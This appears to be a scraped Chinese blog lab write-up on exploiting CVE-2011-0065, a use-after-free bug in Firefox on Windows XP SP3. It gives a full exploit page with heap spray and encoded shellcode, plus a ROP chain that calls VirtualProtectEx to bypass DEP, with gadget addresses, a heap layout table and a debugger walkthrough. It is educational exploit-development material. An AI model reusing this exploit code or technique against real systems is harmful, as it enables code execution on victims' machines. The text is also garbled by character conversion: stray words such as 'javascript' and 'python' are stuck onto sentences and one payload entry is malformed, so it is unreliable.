Rop實戰之利用VirtualProtect繞過DEP

CVE-2011-0065 Firefox mChannel UAF漏洞

爲了實現任意代碼執行,須要在mChannel對象釋放後,用可控數據「佔坑」填充它,所以,可在onChannelRedirect函數調用完成後,緊跟着申請一塊大小相同的內存:javascript

 

e = document.getElementById("d");

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)

fake_obj_addr = unescape("\x1C%u0c0c")

  

 

執行後,虛表指針就會被0x0c0c001c填充,從而控制程序的執行流程,以下圖html

 

 

 

 

接下來,只需利用Heap Spray技術將shellcode噴射到0x0c0c0034的位置便可實現任意代碼執行:java

#######exp.html

<html>

<body>

<object id="d"><object>

<script type="text/javascript">

 

e = document.getElementById("d");

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)

fake_obj_addr = unescape("\x1C%u0c0c")

 

var shellcode =

unescape("%u4141%u4141%u0038%u0c0c%uc012%u0038%u0c0c%u4141%uA2EC%u7D66%u003c%u0c0c%u476c%u7C47%u4141%u4141%u0090%u0c0c%u4141%u4141%u4141%u4141%u323b%u1042%u1ad4%u7c80%u0084%u0c0c%u0090%u0c0c%u0400%u0000%u1A61%u7C80%u0090%u0c0c%uffff%uffff%u0000%u0c00%u0000%u0010%u0040%u0000%u0024%u0c0c%u0090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%udb33%u6853%u6c72%u2020%u6e68%u6761%u6869%u6d20%u6f6f%u6968%u6120%u8b6d%u53c4%u5050%ub853%u085c%u77d5%ud0ff%ub853%ucafa%u7c81%ud0ff%u9090%u9090")

 

var ret_addr = unescape("%u0024%u0c0c")

while(ret_addr.length+20+8 < 0x100000-18-12-12-12) {ret_addr += ret_addr}

var b = ret_addr.substring(0,(0x48-0x24)/2)

b += shellcode

b += ret_addr

var next = b.substring(0,0x10000/2)

while(next.length<0x800000) {next += next}

var again = next.substring(0,0x80000 - (0x1020-0x08)/2)

array = new Array()

for (n=0;n<0x1f0;n++){

  array[n] = again + shellcode

}

 

e.data = ""

   

</script>

</body>

</html>

  

1 VirtualProtect函數

因爲Windows xp sp3開啓了DEP保護,因此咱們要繞過DEP保護才能執行shellcode,本文采用ROP方式調用VirtualProtect方法繞過DEPpython

首先咱們來看看 MSDN 上對 VirtualProtect 函數的說明。shell

 

BOOL VirtualProtect (
LPVOID lpAddress,
DWORD dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);

  

各參數的意義爲:
lpAddress,要改變屬性的內存起始地址。
dwSize,要改變屬性的內存區域大小。
flNewProtect,內存新的屬性類型,設置爲 PAGE_EXECUTE_READWRITE( 0x40)時該內存頁爲可讀可寫可執行。
pflOldProtect,內存原始屬性類型保存地址。
修改內存屬性成功時函數返回非 0,修改失敗時返回 0。
若是咱們可以按照以下參數佈置好棧幀的話就能夠將 shellcode 所在內存區域設置爲可執行模式函數

 

BOOL VirtualProtect(
shellcode 所在內存空間起始地址,
shellcode 大小,
0x40,
某個可寫地址
);佈局

 

其實經過彙編代碼咱們會發現其實VirtualProtect有五個參數,spa

 

 

-1(0xffffffff)參數表明進程句柄,構造參數時設爲0xffffffff便可插件

2 ROP序列

ROP中要用到的三個關鍵程序片斷指針

片斷一*************************************************************************

7D66A2EC    8B49 0C         mov ecx,dword ptr ds:[ecx+0xC] 

7D66A2EF    8B01            mov eax,dword ptr ds:[ecx]     

7D66A2F1    52               push edx

7D66A2F2    51               push ecx

7D66A2F3    FF50 14          call dword ptr ds:[eax+0x14]   

片斷二*************************************************************************

1042323b                     push eax

                             pop esp

                             retn 0c  

片斷三*************************************************************************

7C47476C   83C4 18          ADD ESP,18  

7C47476F   C3               RETN

  

三個片斷地址尋找是經過immunity inc 的mona插件和 ollydbg的ollyFindAddr插件尋找的

 

3.3 Shellcode佈局

Shellcode佈局:

堆地址

備註

0c0c0024

%u4141%u4141

填充

0c0c0028

%u0038%u0c0c

堆地址

0c0c002c

%u4141%u4141

填充

0c0c0030

%u4141%u4141

填充

0c0c0034

%uA2EC%u7D66

片斷一地址

0c0c0038

%u003c%u0c0c

堆地址

0c0c003c

%u476c%u7C47

片斷三地址

0c0c0040 - 0c0c004c

%u4141%u4141

填充

0c0c0050

%u323b%u1042

片斷二地址

0c0c0054 - 0c0c0060

%u4141%u4141

填充

0c0c0064

%u1A61%u7C80

VirtualProtectEx函數首地址

0c0c0068

%0090d%u0c0c

彈窗代碼首地址(堆地址)

0c0c006c

%uffff%uffff

VirtualProtectEx參數一(-1)

0c0c0070

%u0000%u0c00

shellcode 所在內存空間起始地址

0c0c0074

%u0000%u0010

shellcode 大小(堆塊大小)

0c0c0078

%u0040%u0000

0x40

0c0c007c

%u0024%u0c0c

可寫地址(堆地址)

0c0c0080 – 0c0c008c

%u0090%u9090

Nop指令

0c0c0090

 

%udb33%u6853

%u6c72%u2020

%u6e68%u6761

%u6869%u6d20

%u6f6f%u6968

%u6120%u8b6d

%u53c4%u5050

%ub853%u085c

%u77d5%ud0ff

%u77d5%ud0ff

%ub853%ucafa

%u7c81%ud0ff

彈窗代碼

 

下面咱們跟着咱們的exp.html動態跟蹤一下exploit過程:

首先咱們來到對象調用虛函數這裏,此時咱們已經劫持了程序流程,虛函數指針爲0c0c001c,

正在調用位於【ecx + 18h】的虛函數,能夠看到此時調用的虛函數已經被咱們覆蓋成片斷一的首地址,因此咱們會執行片斷一中的內容

按F11進入

這裏執行片斷一的內容,片斷一執行到最後,eax的值爲0c0c003c,ecx的值爲0c0c0038

最後跳轉到【eax + 14h】所指的地址,即0c0c0050所指的地址,此時0c00050中已經被咱們覆蓋爲1042323b,即片斷二的首地址,接下來將執行片斷二

按F11進入

片斷二執行完畢後,esp的值爲0c0c003c,能夠看到從如今開始堆成爲了棧,這是很重要的,

片斷二執行完畢後,將返回【esp】,即0c0c003c所指向的地址,咱們已經將0c0c003c覆蓋爲片斷三的首地址7C47476C,於此同時,esp的值加(4 + 0ch),變爲0c0c004c

按F10進入

 

執行片斷三的內容,執行完後,esp的值變爲0c0c0064,執行完後,進入[esp],即0c0c0064中內容所指向的地址,此時0c0c0064內容已經被咱們覆蓋爲VirtualProtectEX函數的首地址7C801A61。

於此同時咱們能夠看一下此時‘棧’裏的狀況

 

能夠看到,此時棧中返回地址和VirtualProtectEX參數已經都排列好了

繼續按F10運行

這裏就是執行VirtualProtectEX函數將當前堆內存權限設置爲可讀可寫可執行,咱們直接運行到函數末尾

此時VirtualProtectEX已經執行完畢,接下來要返回到【esp】,即0c0c0068內容所指向的地址去執行,而0c0c0068已經被咱們覆蓋爲0c0c0090,也就是咱們存放彈窗代碼的首地址,若是咱們成功繞過了DEF,那麼咱們就能執行彈窗指令了。

按F10繼續

 

咱們已經來到了最後一步,咱們先看看當前內存權限

 

能夠看到,當前內存權限爲可讀可寫可執行,因而咱們直接按g執行彈窗代碼

 

 

4 最後

整個實驗到此結束,這實驗主要考察調試能力和找ROP鏈能力,以及shellcode排布和函數運行時棧的狀況也要了解,除了用VirtualProtect函數,固然還能夠用ZwSetInformationProcess或者VirtualAlloc函數繞過DEP

相關文章
相關標籤/搜索